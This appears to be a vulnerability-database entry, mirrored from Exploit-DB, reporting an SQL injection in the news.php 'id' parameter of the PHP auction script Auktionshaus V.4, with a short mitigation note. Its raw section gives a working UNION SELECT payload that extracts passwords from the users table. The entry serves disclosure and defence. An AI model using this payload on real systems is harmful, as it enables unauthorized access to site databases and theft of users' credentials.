Auktionshaus V.4 SQL Injection news.php

vendor:

Auktionshaus V.4

by:

ea$y laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Auktionshaus V.4

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

Auktionshaus V.4 SQL Injection news.php

Auktionshaus V.4 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a malicious SQL query in the 'id' parameter of the 'news.php' script. This can allow an attacker to gain access to sensitive information such as passwords from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input and use parameterized queries.

Source

Exploit-DB raw data:

 ########################################################################
 ##Auktionshaus V.4 SQL Injection news.php                             ##
 ########################################################################
 ########################################################################
 ## _                     _     _                   _                  ##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
 ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
 ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
 ##                                                                    ##
 ########################################################################
##########################################################################
#Script: Auktionshaus V.4]                                               #
#Vulnerabilities [ SQL Injection ]                                       #
#Language: [ PHP ]                                                       #
#Download: [ buy this script ]                                           #
#Founder: [ ea$y laster ]                                                #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]  #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-]                       #                                              #
#Price: [ Commercial License EUR 89,99                                   #
#DEMO : http://demo3.dolorez.de/                                         #
############################################################################
#http://server/news.php?id=-1+union+select+1,2,password,4,5+from+users--#                                        #
############################################################################